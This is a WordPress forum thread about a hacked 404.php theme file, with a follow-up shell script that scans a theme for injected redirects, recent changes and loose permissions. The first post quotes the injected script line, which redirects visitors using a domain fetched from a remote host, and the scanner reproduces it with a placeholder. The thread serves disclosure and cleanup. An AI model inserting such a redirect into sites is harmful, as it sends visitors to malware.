404.php theme hacked - any advice? (6 posts)

  1. talgalili
    Posted 6 years ago #

    Hello people.

    I am writing this in order to
    1) warn other people.
    2) help people who might have gotten this hack
    3) get more tips from more knowledgeable people than me :)

    I entered into one of my sites today and my AVAST antivirus warned me against a Trojan Horse (JS:ScriptIP-inf [Trj])
    That was located inside my theme image files, two of them:
    1) images/ico-catlist.gif\{gzip}
    2) images/ico-arrow.gif\{gzip}

    I searched for them in the source code of the site but couldn't find them.
    I then went to the server and didn't see any changes in those files.
    I then looked for any changes made to any of the files on the site.

    I found that the 404.php file was changed today.
    After opening it I found it had the following code added to the beginning of it (just before the "<?php get_header(); ?>"):

    <script>location='http://scan.<?php echo file_get_contents('http:// borntobebest . biz/actual_domain.txt'); ?>/vista1/6/48017/';</script>

    (I added spaces in the URL, just to be on the safe side)

    I erased the extra line and the site stopped giving Trojan warnings.

    Here are my questions:
    1) My theme directory was CHMOD 775, I changed it to 555 - will this help in the future?
    2) Why did my homepage suffer from a code injection in the 404.php? Isn't the 404.php file activated only when the page is not found?

    Any thoughts will be warmly welcomed.

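The three checks the first post walks through by hand (looking for recently changed files, finding the redirect injected ahead of `get_header()`, and asking whether a 775 directory is a problem) can be scripted. The following is an added example written for this thread, not code from any poster or from WordPress; it builds a constructed theme directory with placeholder contents and a placeholder domain, then runs the checks with POSIX `find`, `awk` and `grep`. The function names, paths and sample files are all assumptions made for the demo.

```shell
#!/bin/sh
# Added example, not code from the forum thread. It builds a small constructed
# WordPress-style theme directory and runs three checks a site owner can run on a
# server after an incident like the one described: which files changed recently,
# which template files carry a <script> redirect injected ahead of get_header(),
# and which paths are group- or world-writable (the 775 vs 555 question).
# Every path, file content and domain below is constructed for the demo.

set -eu

WORK="${TMPDIR:-/tmp}/theme-scan-demo.$$"
THEME="$WORK/wp-content/themes/demo-theme"
mkdir -p "$THEME/images"

# Clean template: begins with the usual get_header() call.
printf '<?php get_header(); ?>\n<h1>Not found</h1>\n<?php get_footer(); ?>\n' > "$THEME/index.php"

# Template with a redirect injected before get_header(). The domain is a placeholder.
printf "<script>location='http://scan.<?php echo file_get_contents('http://placeholder.invalid/actual_domain.txt'); ?>/x/';</script>\n<?php get_header(); ?>\n<h1>Not found</h1>\n" > "$THEME/404.php"

# A theme may legitimately use <script> after get_header(); that must not be flagged.
printf '<?php get_header(); ?>\n<script>console.log("ok");</script>\n' > "$THEME/header.php"

# Age the clean files so only 404.php shows up as recently modified.
touch -t 202001010000 "$THEME/index.php" "$THEME/header.php"

# Fix permissions explicitly so the result does not depend on the caller's umask;
# the theme directory mirrors the 775 mentioned in the post.
chmod 644 "$THEME"/*.php
chmod 755 "$THEME/images"
chmod 775 "$THEME"

# Regular files under $1 modified within the last $2 days, one per line, sorted.
recently_modified() {
    find "$1" -type f -mtime "-$2" | sort
}

# PHP files under $1 where the text *before* the first get_header() call contains a
# <script> tag with a location= redirect or a remote file_get_contents() fetch.
find_injected_templates() {
    find "$1" -type f -name '*.php' | sort | while IFS= read -r f; do
        if awk '/get_header\(/ { exit } { print }' "$f" \
           | grep -Eqi '<script>.*(location=|file_get_contents\([^)]*https?://)'; then
            printf '%s\n' "$f"
        fi
    done
}

# Files and directories under $1 that are group- or world-writable.
writable_by_others() {
    find "$1" \( -perm -020 -o -perm -002 \) | sort
}

# Wrappers over the constructed tree, used by the demo run and the test.
demo_recent()   { recently_modified "$THEME" 1; }
demo_injected() { find_injected_templates "$THEME"; }
demo_writable() { writable_by_others "$THEME"; }

cleanup() { rm -rf "$WORK"; }

# Run with "run" as the first argument to print the three reports and clean up.
if [ "${1:-}" = "run" ]; then
    echo "Recently modified:";     demo_recent
    echo "Injected templates:";    demo_injected
    echo "Group/world-writable:";  demo_writable
    cleanup
fi
```

On a real install you would point `recently_modified`, `find_injected_templates` and `writable_by_others` at `wp-content/themes` rather than the constructed tree; the injected-template check only looks at text before the first `get_header()` call so that a theme's own legitimate `<script>` tags further down are not reported.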

  2. mousewrites
    Posted 6 years ago #

    Check to make sure your index.php files weren't modified as well. I had the same thing happen to me this morning. Same code and everything.

  3. talgalili
    Posted 6 years ago #

    Thanks mousewrites,
    I checked, it wasn't changed.

    Thanks again :)


  4. esmi
    Forum Moderator
    Posted 6 years ago #

  5. UseShots
    Posted 6 years ago #


    I would be warned if Avast reports images as harmful files. Make sure those gif files don't have any extra content.

    If the gif files are real GIF files with no extra content, this could be a sign of another serious problem: the whole server (not just your site) could be hacked so that it serves malicious content for random requests.

    For example, during the Beladen infection I saw AV warnings even for favicon.ico files (you can see screenshots here):

  6. talgalili
    Posted 6 years ago #

    Thanks UseShots, I notified my host (site5.com) about it. They said they are fine on their side.
